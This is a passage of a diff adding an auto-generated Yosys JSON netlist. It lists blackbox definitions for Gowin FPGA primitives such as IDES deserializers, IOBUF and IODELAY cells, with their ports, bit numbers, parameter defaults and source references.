"Q0": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:800.9-800.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:799.9-799.11" + } + }, + "Q2": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:798.9-798.11" + } + }, + "Q3": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:797.9-797.11" + } + }, + "Q4": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:796.9-796.11" + } + }, + "Q5": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:795.9-795.11" + } + }, + "Q6": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:794.9-794.11" + } + }, + "Q7": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:793.9-793.11" + } + }, + "Q8": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:792.9-792.11" + } + }, + "Q9": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:791.9-791.11" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:788.8-788.13" + } + } + } + }, + "IDES16": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:826.1-854.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "Q15": { + "direction": "output", + "bits": [ 2 ] + }, + "Q14": { + "direction": "output", + "bits": [ 3 ] + }, + "Q13": { + "direction": "output", + "bits": [ 4 ] + }, + "Q12": { + "direction": "output", + "bits": [ 5 ] + }, + "Q11": { + "direction": "output", + "bits": [ 6 ] + }, + "Q10": { + "direction": "output", + "bits": [ 7 ] + }, + "Q9": { + "direction": "output", + "bits": [ 8 ] + }, + "Q8": { + "direction": "output", + "bits": [ 9 ] + }, + "Q7": { + "direction": "output", + "bits": [ 10 ] + }, + "Q6": { + "direction": "output", + "bits": [ 11 ] + }, + "Q5": { + "direction": "output", + "bits": [ 12 ] + }, + "Q4": { + "direction": "output", + "bits": [ 13 ] + }, + "Q3": { + "direction": "output", + "bits": [ 14 ] + }, + "Q2": { + "direction": "output", + "bits": [ 15 ] + }, + "Q1": { + "direction": "output", + "bits": [ 16 ] + }, + "Q0": { + "direction": "output", + "bits": [ 17 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 18 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 19 ] + }, + "RESET": { + "direction": "input", + "bits": [ 20 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 21 ] + }, + "D": { + "direction": "input", + "bits": [ 22 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:833.8-833.13" + } + }, + "D": { + "hide_name": 0, + "bits": [ 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:829.8-829.9" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:830.8-830.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:831.8-831.12" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:850.9-850.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:849.9-849.11" + } + }, + "Q10": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:840.9-840.12" + } + }, + "Q11": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:839.9-839.12" + } + }, + "Q12": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:838.9-838.12" + } + }, + "Q13": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:837.9-837.12" + } + }, + "Q14": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:836.9-836.12" + } + }, + "Q15": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:835.9-835.12" + } + }, + "Q2": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:848.9-848.11" + } + }, + "Q3": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:847.9-847.11" + } + }, + "Q4": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:846.9-846.11" + } + }, + "Q5": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:845.9-845.11" + } + }, + "Q6": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:844.9-844.11" + } + }, + "Q7": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:843.9-843.11" + } + }, + "Q8": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:842.9-842.11" + } + }, + "Q9": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:841.9-841.11" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:832.8-832.13" + } + } + } + }, + "IDES4": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:730.1-745.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "Q3": { + "direction": "output", + "bits": [ 2 ] + }, + "Q2": { + "direction": "output", + "bits": [ 3 ] + }, + "Q1": { + "direction": "output", + "bits": [ 4 ] + }, + "Q0": { + "direction": "output", + "bits": [ 5 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 6 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 7 ] + }, + "RESET": { + "direction": "input", + "bits": [ 8 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 9 ] + }, + "D": { + "direction": "input", + "bits": [ 10 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:736.8-736.13" + } + }, + "D": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:732.8-732.9" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:733.8-733.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:734.8-734.12" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:741.9-741.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:740.9-740.11" + } + }, + "Q2": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:739.9-739.11" + } + }, + "Q3": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:738.9-738.11" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:735.8-735.13" + } + } + } + }, + "IDES4_MEM": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:747.1-760.10" + }, + "parameter_default_values": { + "GSREN": " ", + "ID": " ", + "LSREN": " " + }, + "ports": { + "Q0": { + "direction": "output", + "bits": [ 2 ] + }, + "Q1": { + "direction": "output", + "bits": [ 3 ] + }, + "Q2": { + "direction": "output", + "bits": [ 4 ] + }, + "Q3": { + "direction": "output", + "bits": [ 5 ] + }, + "D": { + "direction": "input", + "bits": [ 6 ] + }, + "WADDR": { + "direction": "input", + "bits": [ 7, 8, 9 ] + }, + "RADDR": { + "direction": "input", + "bits": [ 10, 11, 12 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 13 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 14 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 15 ] + }, + "ICLK": { + "direction": "input", + "bits": [ 16 ] + }, + "RESET": { + "direction": "input", + "bits": [ 17 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:755.7-755.12" + } + }, + "D": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:752.7-752.8" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:752.16-752.20" + } + }, + "ICLK": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:752.10-752.14" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:752.22-752.26" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:757.8-757.10" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:757.11-757.13" + } + }, + "Q2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:757.14-757.16" + } + }, + "Q3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:757.17-757.19" + } + }, + "RADDR": { + "hide_name": 0, + "bits": [ 10, 11, 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:754.13-754.18" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:755.14-755.19" + } + }, + "WADDR": { + "hide_name": 0, + "bits": [ 7, 8, 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:753.13-753.18" + } + } + } + }, + "IDES8": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:762.1-781.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "Q7": { + "direction": "output", + "bits": [ 2 ] + }, + "Q6": { + "direction": "output", + "bits": [ 3 ] + }, + "Q5": { + "direction": "output", + "bits": [ 4 ] + }, + "Q4": { + "direction": "output", + "bits": [ 5 ] + }, + "Q3": { + "direction": "output", + "bits": [ 6 ] + }, + "Q2": { + "direction": "output", + "bits": [ 7 ] + }, + "Q1": { + "direction": "output", + "bits": [ 8 ] + }, + "Q0": { + "direction": "output", + "bits": [ 9 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 10 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 11 ] + }, + "RESET": { + "direction": "input", + "bits": [ 12 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 13 ] + }, + "D": { + "direction": "input", + "bits": [ 14 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:768.8-768.13" + } + }, + "D": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:764.8-764.9" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:765.8-765.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:766.8-766.12" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:777.9-777.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:776.9-776.11" + } + }, + "Q2": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:775.9-775.11" + } + }, + "Q3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:774.9-774.11" + } + }, + "Q4": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:773.9-773.11" + } + }, + "Q5": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:772.9-772.11" + } + }, + "Q6": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:771.9-771.11" + } + }, + "Q7": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:770.9-770.11" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:767.8-767.13" + } + } + } + }, + "IEM": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:180.1-186.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true", + "WINSIZE": "SMALL" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "CLK": { + "direction": "input", + "bits": [ 3 ] + }, + "RESET": { + "direction": "input", + "bits": [ 4 ] + }, + "MCLK": { + "direction": "input", + "bits": [ 5 ] + }, + "LAG": { + "direction": "output", + "bits": [ 6 ] + }, + "LEAD": { + "direction": "output", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:184.10-184.13" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:184.7-184.8" + } + }, + "LAG": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:185.8-185.11" + } + }, + "LEAD": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:185.13-185.17" + } + }, + "MCLK": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:184.22-184.26" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:184.15-184.20" + } + } + } + }, + "INV": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:163.1-166.10" + }, + "ports": { + "I": { + "direction": "input", + "bits": [ 2 ] + }, + "O": { + "direction": "output", + "bits": [ 3 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:164.8-164.9" + } + }, + "O": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:165.8-165.9" + } + } + } + }, + "IOBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:577.1-583.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "IO": { + "direction": "inout", + "bits": [ 3 ] + }, + "I": { + "direction": "input", + "bits": [ 4 ] + }, + "OEN": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:578.9-578.10" + } + }, + "IO": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:580.9-580.11" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:579.10-579.11" + } + }, + "OEN": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:578.11-578.14" + } + } + } + }, + "IODELAY": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:169.1-177.10" + }, + "parameter_default_values": { + "C_STATIC_DLY": "00000000000000000000000000000000" + }, + "ports": { + "DI": { + "direction": "input", + "bits": [ 2 ] + }, + "SDTAP": { + "direction": "input", + "bits": [ 3 ] + }, + "SETN": { + "direction": "input", + "bits": [ 4 ] + }, + "VALUE": { + "direction": "input", + "bits": [ 5 ] + }, + "DF": { + "direction": "output", + "bits": [ 6 ] + }, + "DO": { + "direction": "output", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "DF": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:175.8-175.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:171.7-171.9" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:176.8-176.10" + } + }, + "SDTAP": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:172.8-172.13" + } + }, + "SETN": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:173.8-173.12" + } + }, + "VALUE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:174.8-174.13" + } + } + } + }, + "IODELAYA": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1771.1-1779.10" + }, + "parameter_default_values": { + "C_STATIC_DLY": "00000000000000000000000000000000" + }, + "ports": { + "DI": { + "direction": "input", + "bits": [ 2 ] + }, + "SDTAP": { + "direction": "input", + "bits": [ 3 ] + }, + "SETN": { + "direction": "input", + "bits": [ 4 ] + }, + "VALUE": { + "direction": "input", + "bits": [ 5 ] + }, + "DF": { + "direction": "output", + "bits": [ 6 ] + }, + "DO": { + "direction": "output", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "DF": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1777.8-1777.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1773.7-1773.9" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1778.8-1778.10" + } + }, + "SDTAP": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1774.8-1774.13" + } + }, + "SETN": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1775.8-1775.12" + } + }, + "VALUE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1776.8-1776.13" + } + } + } + }, + "IODELAYB": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1817.1-1829.10" + }, + "parameter_default_values": { + "C_STATIC_DLY": "00000000000000000000000000000000", + "DA_SEL": "00", + "DELAY_MUX": "00" + }, + "ports": { + "DI": { + "direction": "input", + "bits": [ 2 ] + }, + "SDTAP": { + "direction": "input", + "bits": [ 3 ] + }, + "SETN": { + "direction": "input", + "bits": [ 4 ] + }, + "VALUE": { + "direction": "input", + "bits": [ 5 ] + }, + "DAADJ": { + "direction": "input", + "bits": [ 6, 7 ] + }, + "DF": { + "direction": "output", + "bits": [ 8 ] + }, + "DO": { + "direction": "output", + "bits": [ 9 ] + }, + "DAO": { + "direction": "output", + "bits": [ 10 ] + } + }, + "cells": { + }, + "netnames": { + "DAADJ": { + "hide_name": 0, + "bits": [ 6, 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1825.13-1825.18" + } + }, + "DAO": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1828.8-1828.11" + } + }, + "DF": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1826.8-1826.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1821.7-1821.9" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1827.8-1827.10" + } + }, + "SDTAP": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1822.8-1822.13" + } + }, + "SETN": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1823.8-1823.12" + } + }, + "VALUE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1824.8-1824.13" + } + } + } + }, + "IODELAYC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1781.1-1794.10" + }, + "parameter_default_values": { + "C_STATIC_DLY": "00000000000000000000000000000000", + "DA_SEL": "00", + "DYN_DA_SEL": "false" + }, + "ports": { + "DI": { + "direction": "input", + "bits": [ 2 ] + }, + "SDTAP": { + "direction": "input", + "bits": [ 3 ] + }, + "SETN": { + "direction": "input", + "bits": [ 4 ] + }, + "VALUE": { + "direction": "input", + "bits": [ 5 ] + }, + "DASEL": { + "direction": "input", + "bits": [ 6, 7 ] + }, + "DAADJ": { + "direction": "input", + "bits": [ 8, 9 ] + }, + "DF": { + "direction": "output", + "bits": [ 10 ] + }, + "DO": { + "direction": "output", + "bits": [ 11 ] + }, + "DAO": { + "direction": "output", + "bits": [ 12 ] + } + }, + "cells": { + }, + "netnames": { + "DAADJ": { + "hide_name": 0, + "bits": [ 8, 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1790.13-1790.18" + } + }, + "DAO": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1793.8-1793.11" + } + }, + "DASEL": { + "hide_name": 0, + "bits": [ 6, 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1789.13-1789.18" + } + }, + "DF": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1791.8-1791.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1785.7-1785.9" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1792.8-1792.10" + } + }, + "SDTAP": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1786.8-1786.13" + } + }, + "SETN": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1787.8-1787.12" + } + }, + "VALUE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1788.8-1788.13" + } + } + } + }, + "IVIDEO": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:806.1-824.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "Q6": { + "direction": "output", + "bits": [ 2 ] + }, + "Q5": { + "direction": "output", + "bits": [ 3 ] + }, + "Q4": { + "direction": "output", + "bits": [ 4 ] + }, + "Q3": { + "direction": "output", + "bits": [ 5 ] + }, + "Q2": { + "direction": "output", + 